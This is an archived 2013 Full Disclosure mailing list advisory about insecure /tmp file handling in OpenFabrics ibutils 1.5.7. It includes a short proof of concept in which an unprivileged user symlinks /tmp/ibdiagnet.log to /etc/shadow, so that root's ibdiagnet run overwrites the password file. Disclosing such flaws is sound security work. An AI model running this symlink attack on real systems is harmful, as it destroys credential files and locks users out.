Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 06 Mar 2013 18:35:14 +0000 (GMT)

´╗┐OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability ´╗┐

3/6/2013
Larry W. Cashdollar
@_larry0

The infiniband diagnostic utiltiy handles files in /tmp insecurely. A malicious user can clobber root owned files with 
common symlink attacks.

http://www.openfabrics.org/downloads/ibutils/

[nobody () exdb01 tmp]$ ln -s /etc/shadow ibdiagnet.log
[nobody () exdb01 tmp]$ ls -l ibdiagnet.log lrwxrwxrwx 1 nobody users 11 Mar 6 18:19 ibdiagnet.log -> /etc/shadow 
[nobody () exdb01 tmp]$
The following files are created, I imagine anyone of them can be used.

[root () exdb01 tmp]# ls -l /tmp/ibdiagnet* -rw-r--r-- 1 root root 57611 Mar 6 18:20 /tmp/ibdiagnet.db -rw-r--r-- 1 
root root 830 Mar 6 18:20 /tmp/ibdiagnet.fdbs -rw-r--r-- 1 root root 5805 Mar 6 18:20 /tmp/ibdiagnet_ibis.log 
-rw-r--r-- 1 root root 2359 Mar 6 18:20 /tmp/ibdiagnet.log -rw-r--r-- 1 root root 7072 Mar 6 18:20 /tmp/ibdiagnet.lst 
-rw-r--r-- 1 root root 456 Mar 6 18:20 /tmp/ibdiagnet.mcfdbs -rw-r--r-- 1 root root 784 Mar 6 18:20 /tmp/ibdiagnet.pkey 
-rw-r--r-- 1 root root 3348 Mar 6 18:20 /tmp/ibdiagnet.psl -rw-r--r-- 1 root root 179228 Mar 6 18:20 
/tmp/ibdiagnet.slvl -rw-r--r-- 1 root root 193 Mar 6 18:20 /tmp/ibdiagnet.sm
After root runs a diagnostic command:

[root () exdb01 tmp]# ibdiagnet -ls 10 -lw 4x -vlr Loading IBDIAGNET from: /usr/lib64/ibdiagnet1.5.7 -W- Topology file 
is not specified.

Reports regarding cluster links will use direct routes. Loading IBDM from: /usr/lib64/ibdm1.5.7 -W- A few ports of 
local device are up.

Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered. .
.
.
.

Extracting SL Based Routing Info 0 0
Please see /tmp/ibdiagnet.log for complete log

-I- Done. Run time was 2 seconds.
Symlinked files are overwritten:

[root () exdb01 tmp] ls -l /etc/shadow
-rw------- 1 root root 2359 Mar 6 18:17 /etc/shadow [root () exdb01 tmp] head /etc/shadow
-W- Topology file is not specified.

Reports regarding cluster links will use direct routes. -W- A few ports of local device are up.

Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered.

-I--------------------------------------------------- -I- Bad Guids/LIDs Info
Versions installed

[root () exdb01 tmp] rpm -aq |grep ibutils ibutils-1.5.7-1.el5
ibutils-libs-1.5.7-1.el5
ibutils-devel-1.5.7-1.el5
[root () exdb01 tmp] 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability Larry W. Cashdollar (Mar 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]